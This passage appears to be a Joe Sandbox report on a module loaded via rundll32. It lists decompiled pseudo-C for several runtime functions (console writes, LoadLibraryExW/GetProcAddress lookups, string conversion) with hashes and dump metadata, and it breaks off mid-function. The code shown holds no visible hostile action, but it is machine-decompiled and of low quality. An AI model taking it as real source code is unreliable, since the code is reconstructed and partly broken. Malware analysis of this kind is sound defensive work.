                          				if ( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x90)) + 0x138)) != _t182) goto 0x8c084bec;
                          				if ( *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t197 * 8)) + _t200 + 0x39)) == dil) goto 0x8c084cab;
                          				if (GetConsoleMode(??, ??) == 0) goto 0x8c084cab;
                          				if (_t103 == 0) goto 0x8c084c8d;
                          				if (_t103 - 1 - 1 > 0) goto 0x8c084d48;
                          				_v104 = _v104 & 0;
                          				_t195 = _t183 + _t201;
                          				_t202 = _t183;
                          				_v100 = 0;
                          				if (_t183 - _t195 >= 0) goto 0x8c084d3e;
                          				r13d =  *_t202 & 0x0000ffff;
                          				if (E00007FF87FF88C08633C(r13w & 0xffffffff) != r13w) goto 0x8c084c7b;
                          				_v100 = 2;
                          				if (r13w != 0xa) goto 0x8c084c70;
                          				r13d = 0xd;
                          				if (E00007FF87FF88C08633C(r13d) != r13w) goto 0x8c084c7b;
                          				_v100 = 2;
                          				if ( &(_t202[1]) - _t195 >= 0) goto 0x8c084c84;
                          				goto 0x8c084c35;
                          				_v104 = GetLastError();
                          				_t198 = _v72;
                          				goto 0x8c084d3e;
                          				r9d = r15d;
                          				E00007FF87FF88C08446C(r12d, 1, __esi, _t167,  &_v104,  &_v64, _t183, _t192);
                          				asm("movsd xmm0, [eax]");
                          				_t124 =  *0x7FF88C0B4978;
                          				goto 0x8c084d43;
                          				if (( *( *((intOrPtr*)(0x8c0b4970 + _t198 * 8)) + _t200 + 0x38) & 0x00000080) == 0) goto 0x8c084d0b;
                          				if (3 == 0) goto 0x8c084cf7;
                          				if (3 == 0) goto 0x8c084ce3;
                          				if (2 != 1) goto 0x8c084d48;
                          				r9d = r15d;
                          				E00007FF87FF88C08477C(3, r12d, 0x8c0b4970, _t167,  &_v104, _t185, _t183);
                          				goto 0x8c084c9f;
                          				r9d = r15d;
                          				E00007FF87FF88C084898(r12d, _t124, 0x8c0b4970, _t167,  &_v104, _t185, _t183);
                          				goto 0x8c084c9f;
                          				r9d = r15d;
                          				E00007FF87FF88C084674(r12d, _t124, 0x8c0b4970, _t167,  &_v104, _t185, _t183);
                          				goto 0x8c084c9f;
                          				_v104 = _v104 & _t124;
                          				_v120 = _v120 & 0x8c0b4970;
                          				r8d = r15d;
                          				_v100 = 0x8c0b4970;
                          				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x8c084d3b;
                          				_t94 = GetLastError();
                          				_v104 = _t94;
                          				asm("movsd xmm0, [ebp-0x30]");
                          				asm("movsd [ebp-0x20], xmm0");
                          				_t164 = _v88 >> 0x20;
                          				if (_t94 != 0) goto 0x8c084dbc;
                          				_t95 = _v88;
                          				if (_t95 == 0) goto 0x8c084d88;
                          				if (_t95 != 5) goto 0x8c084d7b;
                          				E00007FF87FF88C07E6A0(_t164);
                          				 *_t164 = 9;
                          				E00007FF87FF88C07E680(_t164);
                          				 *_t164 = 5;
                          				goto 0x8c084b42;
                          				E00007FF87FF88C07E630(_v88, _t164, _t167);
                          				goto 0x8c084b42;
                          				_t166 =  *((intOrPtr*)(0x8c0b4970 + _t198 * 8));
                          				if (( *(0x8c0b4970 + _t200 + 0x38) & 0x00000040) == 0) goto 0x8c084da4;
                          				if ( *_t183 == 0x1a) goto 0x8c084b1f;
                          				E00007FF87FF88C07E6A0(_t166);
                          				 *0x8c0b4970 = 0x1c;
                          				E00007FF87FF88C07E680(_t166);
                          				 *_t166 =  *_t166 & 0x00000000;
                          				goto 0x8c084b42;
                          				return _v84 - _v96;
                          			}































                          0x7ff88c084af8
                          0x7ff88c084af8
                          0x7ff88c084af8
                          0x7ff88c084af8
                          0x7ff88c084b11
                          0x7ff88c084b14
                          0x7ff88c084b17
                          0x7ff88c084b1d
                          0x7ff88c084b21
                          0x7ff88c084b29
                          0x7ff88c084b2b
                          0x7ff88c084b30
                          0x7ff88c084b32
                          0x7ff88c084b37
                          0x7ff88c084b3d
                          0x7ff88c084b45
                          0x7ff88c084b54
                          0x7ff88c084b5b
                          0x7ff88c084b5f
                          0x7ff88c084b63
                          0x7ff88c084b67
                          0x7ff88c084b6b
                          0x7ff88c084b75
                          0x7ff88c084b7e
                          0x7ff88c084b86
                          0x7ff88c084b8d
                          0x7ff88c084b8d
                          0x7ff88c084b91
                          0x7ff88c084b99
                          0x7ff88c084ba4
                          0x7ff88c084bb1
                          0x7ff88c084bbb
                          0x7ff88c084bc1
                          0x7ff88c084bd4
                          0x7ff88c084be6
                          0x7ff88c084c08
                          0x7ff88c084c10
                          0x7ff88c084c17
                          0x7ff88c084c1d
                          0x7ff88c084c20
                          0x7ff88c084c26
                          0x7ff88c084c29
                          0x7ff88c084c2f
                          0x7ff88c084c35
                          0x7ff88c084c46
                          0x7ff88c084c4b
                          0x7ff88c084c53
                          0x7ff88c084c55
                          0x7ff88c084c67
                          0x7ff88c084c6b
                          0x7ff88c084c77
                          0x7ff88c084c79
                          0x7ff88c084c81
                          0x7ff88c084c84
                          0x7ff88c084c88
                          0x7ff88c084c8d
                          0x7ff88c084c9a
                          0x7ff88c084c9f
                          0x7ff88c084ca3
                          0x7ff88c084ca6
                          0x7ff88c084cbc
                          0x7ff88c084cc3
                          0x7ff88c084cc8
                          0x7ff88c084ccd
                          0x7ff88c084ccf
                          0x7ff88c084cdc
                          0x7ff88c084ce1
                          0x7ff88c084ce3
                          0x7ff88c084cf0
                          0x7ff88c084cf5
                          0x7ff88c084cf7
                          0x7ff88c084d04
                          0x7ff88c084d09
                          0x7ff88c084d14
                          0x7ff88c084d19
                          0x7ff88c084d1e
                          0x7ff88c084d24
                          0x7ff88c084d30
                          0x7ff88c084d32
                          0x7ff88c084d38
                          0x7ff88c084d3e
                          0x7ff88c084d43
                          0x7ff88c084d4c
                          0x7ff88c084d52
                          0x7ff88c084d54
                          0x7ff88c084d59
                          0x7ff88c084d5e
                          0x7ff88c084d60
                          0x7ff88c084d65
                          0x7ff88c084d6b
                          0x7ff88c084d70
                          0x7ff88c084d76
                          0x7ff88c084d7e
                          0x7ff88c084d83
                          0x7ff88c084d8f
                          0x7ff88c084d99
                          0x7ff88c084d9e
                          0x7ff88c084da4
                          0x7ff88c084da9
                          0x7ff88c084daf
                          0x7ff88c084db4
                          0x7ff88c084db7
                          0x7ff88c084dd8

                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                          • Instruction ID: eef463dae4ee02106e8aeaa2528a0663b53b2f1ec4ff8a3be00073a9f06ac156
                          • Opcode Fuzzy Hash: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                          • Instruction Fuzzy Hash: AA81A122E1861289FF609BA6D8606BD2BE4FB56BC8F418135DE0E1B799DF3CA445C710
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 20%
                          			E00007FF87FF88C08446C(signed int __edx, void* __edi, void* __esi, long long __rbx, signed long long __rcx, void* __rdx, long long __r8, void* __r9, long long _a8) {
                          				signed long long _v72;
                          				char _v80;
                          				intOrPtr _v87;
                          				char _v88;
                          				long long _v96;
                          				long long _v104;
                          				int _v108;
                          				intOrPtr _v112;
                          				short _v116;
                          				char _v120;
                          				signed long long _v128;
                          				signed long long _v136;
                          				intOrPtr _v144;
                          				signed int _v152;
                          				int _t80;
                          				long _t85;
                          				signed char _t86;
                          				signed long long _t116;
                          				intOrPtr _t120;
                          				long* _t125;
                          				signed long long _t127;
                          				intOrPtr _t136;
                          				signed long long _t140;
                          				void* _t143;
                          				signed long long _t146;
                          				void* _t148;
                          				void* _t156;
                          				void* _t157;
                          				signed long long _t161;
                          
                          				_t127 = __rcx;
                          				_a8 = __rbx;
                          				_t116 =  *0x8c0b3760; // 0x812541c23493
                          				_v72 = _t116 ^ _t148 - 0x00000080;
                          				r12d = r9d;
                          				_t161 = __edx >> 6;
                          				_t146 = __edx << 6;
                          				_v96 = __r8;
                          				_t125 = __rcx;
                          				_t157 = _t156 + __r8;
                          				_t120 =  *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t161 * 8)) + _t146 + 0x28));
                          				_v104 = 0x8c0b4970;
                          				_v108 = GetConsoleCP();
                          				 *__rcx = __rdx;
                          				 *((intOrPtr*)(__rcx + 8)) = 0;
                          				if (__r8 - _t157 >= 0) goto 0x8c08464a;
                          				r13b =  *((intOrPtr*)(__r8));
                          				_v120 = 0;
                          				_t136 =  *((intOrPtr*)(0x8c0b4970 + _t161 * 8));
                          				_t86 =  *(_t136 + _t146 + 0x3d);
                          				if ((_t86 & 0x00000004) == 0) goto 0x8c08451f;
                          				 *(_t136 + _t146 + 0x3d) = _t86 & 0x000000fb;
                          				r8d = 2;
                          				_v88 =  *((intOrPtr*)(_t136 + _t146 + 0x3e));
                          				_v87 = r13b;
                          				goto 0x8c084564;
                          				E00007FF87FF88C081740(_t86 & 0x000000fb, 0, _t120, __rcx, __rcx,  &_v88, __r9);
                          				if (( *(_t120 + _t127 * 2) & 0x00008000) == 0) goto 0x8c08455b;
                          				if (__r8 - _t157 >= 0) goto 0x8c08462a;
                          				r8d = 2;
                          				if (E00007FF87FF88C081654( &_v120, __r8) == 0xffffffff) goto 0x8c08464a;
                          				_t143 = __r8 + 1;
                          				goto 0x8c084576;
                          				r8d = 1;
                          				if (E00007FF87FF88C081654( &_v120, _t143) == 0xffffffff) goto 0x8c08464a;
                          				_v128 = _v128 & 0x00000000;
                          				_v136 = _v136 & 0x00000000;
                          				r9d = 1;
                          				_v144 = 5;
                          				_v152 =  &_v80;
                          				_t80 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                          				r14d = _t80;
                          				if (_t80 == 0) goto 0x8c08464a;
                          				_v152 = _v152 & 0x00000000;
                          				_t140 =  &_v80;
                          				r8d = _t80;
                          				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8c084642;
                          				_t125[1] = _t125[2] - _v96 + __edi;
                          				if (_v112 - r14d < 0) goto 0x8c08464a;
                          				if (r13b != 0xa) goto 0x8c084622;
                          				_t50 = _t140 + 0xd; // 0xd
                          				_v152 = _t140;
                          				_t52 = _t140 + 1; // 0x1
                          				r8d = _t52;
                          				_v116 = _t50;
                          				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8c084642;
                          				if (_v112 - 1 < 0) goto 0x8c08464a;
                          				_t125[2] = _t125[2] + 1;
                          				_t125[1] = _t125[1] + 1;
                          				goto 0x8c0844e0;
                          				 *((char*)( *((intOrPtr*)(0x8c0b4970 + _t161 * 8)) + _t146 + 0x3e)) =  *((intOrPtr*)(_t143 + 1));
                          				 *( *((intOrPtr*)(0x8c0b4970 + _t161 * 8)) + _t146 + 0x3d) =  *( *((intOrPtr*)(0x8c0b4970 + _t161 * 8)) + _t146 + 0x3d) | 0x00000004;
                          				_t125[1] = _t125[1] + 1;
                          				goto 0x8c08464a;
                          				_t85 = GetLastError();
                          				 *_t125 = _t85;
                          				E00007FF87FF88C086D80();
                          				return _t85;
                          			}
































                          0x7ff88c08446c
                          0x7ff88c08446c
                          0x7ff88c084486
                          0x7ff88c084490
                          0x7ff88c0844a1
                          0x7ff88c0844a4
                          0x7ff88c0844ab
                          0x7ff88c0844b2
                          0x7ff88c0844b6
                          0x7ff88c0844b9
                          0x7ff88c0844c0
                          0x7ff88c0844c5
                          0x7ff88c0844d1
                          0x7ff88c0844d4
                          0x7ff88c0844da
                          0x7ff88c0844e0
                          0x7ff88c0844e6
                          0x7ff88c0844f0
                          0x7ff88c0844f4
                          0x7ff88c0844f8
                          0x7ff88c0844ff
                          0x7ff88c084508
                          0x7ff88c08450c
                          0x7ff88c084516
                          0x7ff88c084519
                          0x7ff88c08451d
                          0x7ff88c08451f
                          0x7ff88c084530
                          0x7ff88c084535
                          0x7ff88c08453b
                          0x7ff88c084550
                          0x7ff88c084556
                          0x7ff88c084559
                          0x7ff88c08455b
                          0x7ff88c084570
                          0x7ff88c084576
                          0x7ff88c084580
                          0x7ff88c08458d
                          0x7ff88c084593
                          0x7ff88c08459d
                          0x7ff88c0845a5
                          0x7ff88c0845ab
                          0x7ff88c0845b0
                          0x7ff88c0845be
                          0x7ff88c0845c4
                          0x7ff88c0845c8
                          0x7ff88c0845d5
                          0x7ff88c0845df
                          0x7ff88c0845e6
                          0x7ff88c0845ec
                          0x7ff88c0845f2
                          0x7ff88c0845f5
                          0x7ff88c0845fa
                          0x7ff88c0845fa
                          0x7ff88c084602
                          0x7ff88c084614
                          0x7ff88c08461a
                          0x7ff88c08461c
                          0x7ff88c08461f
                          0x7ff88c084625
                          0x7ff88c084630
                          0x7ff88c084638
                          0x7ff88c08463d
                          0x7ff88c084640
                          0x7ff88c084642
                          0x7ff88c084648
                          0x7ff88c084654
                          0x7ff88c084673

                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                          • String ID:
                          • API String ID: 3659116390-0
                          • Opcode ID: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                          • Instruction ID: d7f5fce0a63d2527628e5392eeff169cbf11d43a884e3325905144419ad754b0
                          • Opcode Fuzzy Hash: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                          • Instruction Fuzzy Hash: 6151CF32A18A5189EB20CF66E8543AC3BB4FB46BD8F048135CE4A4BB9DDF38D556C704
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 36%
                          			E00007FF87FF88C07F320(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                          				signed long long _t72;
                          				signed long long _t76;
                          				intOrPtr _t78;
                          				signed long long _t80;
                          				signed long long _t89;
                          				struct HINSTANCE__* _t94;
                          				signed long long _t95;
                          				long long _t101;
                          				void* _t105;
                          				signed long long _t109;
                          				signed long long _t111;
                          				signed long long _t114;
                          				struct HINSTANCE__* _t115;
                          				long _t118;
                          				void* _t121;
                          				WCHAR* _t123;
                          
                          				 *((long long*)(_t105 + 8)) = __rbx;
                          				 *((long long*)(_t105 + 0x10)) = _t101;
                          				 *((long long*)(_t105 + 0x18)) = __rsi;
                          				r14d = __ecx;
                          				_t111 =  *0x8c0b3760; // 0x812541c23493
                          				_t95 = _t94 | 0xffffffff;
                          				_t89 = _t111 ^  *(0x7ff88c070000 + 0x44810 + _t121 * 8);
                          				asm("dec eax");
                          				if (_t89 == _t95) goto 0x8c07f4a1;
                          				if (_t89 == 0) goto 0x8c07f389;
                          				_t72 = _t89;
                          				goto 0x8c07f4a3;
                          				if (__r8 == __r9) goto 0x8c07f435;
                          				_t78 =  *((intOrPtr*)(0x7ff88c070000 + 0x44770 + __rsi * 8));
                          				if (_t78 == 0) goto 0x8c07f3a9;
                          				if (_t78 == _t95) goto 0x8c07f421;
                          				goto 0x8c07f41c;
                          				r8d = 0x800;
                          				LoadLibraryExW(_t123, _t121, _t118);
                          				if (_t72 != 0) goto 0x8c07f3ea;
                          				if (GetLastError() != 0x57) goto 0x8c07f3e8;
                          				r8d = 0;
                          				LoadLibraryExW(??, ??, ??);
                          				_t80 = _t72;
                          				goto 0x8c07f3ea;
                          				if (_t80 != 0) goto 0x8c07f403;
                          				 *((intOrPtr*)(0x7ff88c070000 + 0x44770 + __rsi * 8)) = _t95;
                          				goto 0x8c07f421;
                          				_t19 = 0x7ff88c070000 + 0x44770 + __rsi * 8;
                          				_t76 =  *_t19;
                          				 *_t19 = _t80;
                          				if (_t76 == 0) goto 0x8c07f41c;
                          				FreeLibrary(_t115);
                          				if (_t80 != 0) goto 0x8c07f476;
                          				if (__r8 + 4 != __r9) goto 0x8c07f392;
                          				if (_t80 == 0) goto 0x8c07f486;
                          				GetProcAddress(_t94);
                          				if (_t76 == 0) goto 0x8c07f47f;
                          				_t109 =  *0x8c0b3760; // 0x812541c23493
                          				asm("dec eax");
                          				 *(0x7ff88c070000 + 0x44810 + _t121 * 8) = _t76 ^ _t109;
                          				goto 0x8c07f4a3;
                          				goto 0x8c07f437;
                          				_t114 =  *0x8c0b3760; // 0x812541c23493
                          				asm("dec eax");
                          				 *(0x7ff88c070000 + 0x44810 + _t121 * 8) = _t95 ^ _t114;
                          				return 0;
                          			}



















                          0x7ff88c07f320
                          0x7ff88c07f325
                          0x7ff88c07f32a
                          0x7ff88c07f33c
                          0x7ff88c07f357
                          0x7ff88c07f35e
                          0x7ff88c07f368
                          0x7ff88c07f370
                          0x7ff88c07f376
                          0x7ff88c07f37f
                          0x7ff88c07f381
                          0x7ff88c07f384
                          0x7ff88c07f38c
                          0x7ff88c07f395
                          0x7ff88c07f3a0
                          0x7ff88c07f3a5
                          0x7ff88c07f3a7
                          0x7ff88c07f3b6
                          0x7ff88c07f3bc
                          0x7ff88c07f3c8
                          0x7ff88c07f3d3
                          0x7ff88c07f3d5
                          0x7ff88c07f3dd
                          0x7ff88c07f3e3
                          0x7ff88c07f3e6
                          0x7ff88c07f3f4
                          0x7ff88c07f3f9
                          0x7ff88c07f401
                          0x7ff88c07f406
                          0x7ff88c07f406
                          0x7ff88c07f406
                          0x7ff88c07f411
                          0x7ff88c07f416
                          0x7ff88c07f41f
                          0x7ff88c07f428
                          0x7ff88c07f43a
                          0x7ff88c07f442
                          0x7ff88c07f44b
                          0x7ff88c07f44d
                          0x7ff88c07f466
                          0x7ff88c07f46c
                          0x7ff88c07f474
                          0x7ff88c07f47d
                          0x7ff88c07f47f
                          0x7ff88c07f493
                          0x7ff88c07f499
                          0x7ff88c07f4bf

                          APIs
                          • GetProcAddress.KERNEL32(?,0000812541C23493,00000006,00007FF88C07F647,?,?,00000000,00007FF88C07F1C7,?,?,0000812541C23493,00007FF88C07E6A9), ref: 00007FF88C07F442
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc
                          • String ID:
                          • API String ID: 190572456-0
                          • Opcode ID: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                          • Instruction ID: ad442c374d198475d172c28cd7714dc872b14ccb20cb11012f1bc2924181d778
                          • Opcode Fuzzy Hash: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                          • Instruction Fuzzy Hash: 304146A1B0EA4A82FE299B52E8142756391BF66BE0F198535DE1D4B78CEF3DE401C344
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 32%
                          			E00007FF87FF88C084EEC(void* __edx, long long __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                          				intOrPtr _v32;
                          				long long _v40;
                          				void* _t11;
                          				long long _t49;
                          
                          				_a8 = __rbx;
                          				_a16 = __rbp;
                          				_a24 = __rsi;
                          				if (__rcx != 0) goto 0x8c084f28;
                          				_t11 = E00007FF87FF88C07E6A0(__rax);
                          				 *((intOrPtr*)(__rax)) = 0x16;
                          				E00007FF87FF88C07E580(_t11);
                          				goto 0x8c084fc9;
                          				if (__rdx == 0) goto 0x8c084f11;
                          				E00007FF87FF88C07F4C0();
                          				_v32 = 0;
                          				r15d = 0;
                          				 *__rdx = _t49;
                          				r15b = 0 == 0;
                          				_v40 = _t49;
                          				r9d = r9d | 0xffffffff;
                          				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x8c084f6f;
                          				E00007FF87FF88C07E630(GetLastError(), __rax, __rbx);
                          				goto 0x8c084f21;
                          				E00007FF87FF88C07E154(__rax, _t14 + _t14);
                          				if (__rax == 0) goto 0x8c084fbf;
                          				_v32 = r14d;
                          				r9d = r9d | 0xffffffff;
                          				_v40 = __rax;
                          				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x8c084fb1;
                          				E00007FF87FF88C07E630(GetLastError(), __rax, __rax);
                          				goto 0x8c084fbf;
                          				 *__rdx = __rax;
                          				E00007FF87FF88C07E114(__rax, _t49);
                          				return 1;
                          			}







                          0x7ff88c084eec
                          0x7ff88c084ef1
                          0x7ff88c084ef6
                          0x7ff88c084f0f
                          0x7ff88c084f11
                          0x7ff88c084f16
                          0x7ff88c084f1c
                          0x7ff88c084f23
                          0x7ff88c084f2b
                          0x7ff88c084f2d
                          0x7ff88c084f34
                          0x7ff88c084f38
                          0x7ff88c084f3b
                          0x7ff88c084f3e
                          0x7ff88c084f42
                          0x7ff88c084f4a
                          0x7ff88c084f5e
                          0x7ff88c084f68
                          0x7ff88c084f6d
                          0x7ff88c084f75
                          0x7ff88c084f80
                          0x7ff88c084f82
                          0x7ff88c084f87
                          0x7ff88c084f8e
                          0x7ff88c084fa0
                          0x7ff88c084faa
                          0x7ff88c084faf
                          0x7ff88c084fb7
                          0x7ff88c084fc2
                          0x7ff88c084fe1

                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: ByteCharErrorLastMultiWide$AllocHeap_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 2395940807-0
                          • Opcode ID: 35dbe73a7bb461abc9f03f03902340b94bb8d2f0b9dbf59d0741637dfc6f8abb
                          • Instruction ID: 4aac6d474f6ee7f53c4b8f524053b0a6974bde5acd8e38c0170b8cae9182a301
                          • Opcode Fuzzy Hash: 35dbe73a7bb461abc9f03f03902340b94bb8d2f0b9dbf59d0741637dfc6f8abb
                          • Instruction Fuzzy Hash: E5210271A09B5245EE64AFA6EC10139A2E5BF96BD0F044534ED5D477AEEF3CE400C200
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E00007FF87FF88C086400(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                          				signed int _t27;
                          				signed int _t28;
                          				signed int _t29;
                          				signed int _t30;
                          				signed int _t31;
                          				signed int _t43;
                          				signed int _t44;
                          				signed int _t45;
                          				signed int _t47;
                          				void* _t52;
                          
                          				_a8 = __rbx;
                          				_a16 = __rsi;
                          				_t27 = __ecx & 0x0000001f;
                          				if ((__ecx & 0x00000008) == 0) goto 0x8c086431;
                          				if (__edx >= 0) goto 0x8c086431;
                          				E00007FF87FF88C086BDC(_t27, _t52);
                          				_t28 = _t27 & 0xfffffff7;
                          				goto 0x8c086488;
                          				_t43 = 0x00000004 & dil;
                          				if (_t43 == 0) goto 0x8c08644c;
                          				asm("dec eax");
                          				if (_t43 >= 0) goto 0x8c08644c;
                          				E00007FF87FF88C086BDC(_t28, _t52);
                          				_t29 = _t28 & 0xfffffffb;
                          				goto 0x8c086488;
                          				_t44 = dil & 0x00000001;
                          				if (_t44 == 0) goto 0x8c086468;
                          				asm("dec eax");
                          				if (_t44 >= 0) goto 0x8c086468;
                          				E00007FF87FF88C086BDC(_t29, _t52);
                          				_t30 = _t29 & 0xfffffffe;
                          				goto 0x8c086488;
                          				_t45 = dil & 0x00000002;
                          				if (_t45 == 0) goto 0x8c086488;
                          				asm("dec eax");
                          				if (_t45 >= 0) goto 0x8c086488;
                          				if ((dil & 0x00000010) == 0) goto 0x8c086485;
                          				E00007FF87FF88C086BDC(_t30, _t52);
                          				_t31 = _t30 & 0xfffffffd;
                          				_t47 = dil & 0x00000010;
                          				if (_t47 == 0) goto 0x8c0864a2;
                          				asm("dec eax");
                          				if (_t47 >= 0) goto 0x8c0864a2;
                          				E00007FF87FF88C086BDC(_t31, _t52);
                          				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                          			}













                          0x7ff88c086400
                          0x7ff88c086405
                          0x7ff88c086414
                          0x7ff88c08641c
                          0x7ff88c086420
                          0x7ff88c086427
                          0x7ff88c08642c
                          0x7ff88c08642f
                          0x7ff88c086436
                          0x7ff88c086439
                          0x7ff88c08643b
                          0x7ff88c086440
                          0x7ff88c086442
                          0x7ff88c086447
                          0x7ff88c08644a
                          0x7ff88c08644c
                          0x7ff88c086450
                          0x7ff88c086452
                          0x7ff88c086457
                          0x7ff88c08645e
                          0x7ff88c086463
                          0x7ff88c086466
                          0x7ff88c086468
                          0x7ff88c08646c
                          0x7ff88c08646e
                          0x7ff88c086473
                          0x7ff88c086479
                          0x7ff88c086480
                          0x7ff88c086485
                          0x7ff88c086488
                          0x7ff88c08648c
                          0x7ff88c08648e
                          0x7ff88c086493
                          0x7ff88c08649a
                          0x7ff88c0864b8

                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          • API String ID: 1156100317-0
                          • Opcode ID: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                          • Instruction ID: 9f05eccc43f1acaa2d228e4acda60c3f4aaa29cae909a08e6ab9e3b9b8ffb7ff
                          • Opcode Fuzzy Hash: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                          • Instruction Fuzzy Hash: F3116D26E1861209FE781126DC8237D11C1FF573F4E4ADA34EA7E0A6DECF2CA880C211
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 58%
                          			E00007FF87FF88C08A4A0(long long __rax, signed int __rcx, void* __rdx, void* __r9, intOrPtr _a16, intOrPtr _a80, intOrPtr _a88, intOrPtr _a96, intOrPtr _a104, intOrPtr _a120) {
                          				long long _v96;
                          				short _v104;
                          				void* __rbx;
                          				long long _t55;
                          				intOrPtr _t60;
                          				signed long long _t62;
                          				void* _t68;
                          				void* _t69;
                          
                          				_t55 = __rax;
                          				r8d = r8d + 4;
                          				_a104 = _a104 + 0xfffffdb4;
                          				r9d = __rcx - 0x30d5;
                          				_a96 = r8d;
                          				_a16 = r9d;
                          				_a120 = _a80 + 0xffffda68;
                          				if (_a120 + 0x18b7 - __r9 + 0x38e9 > 0) goto 0x8c08a608;
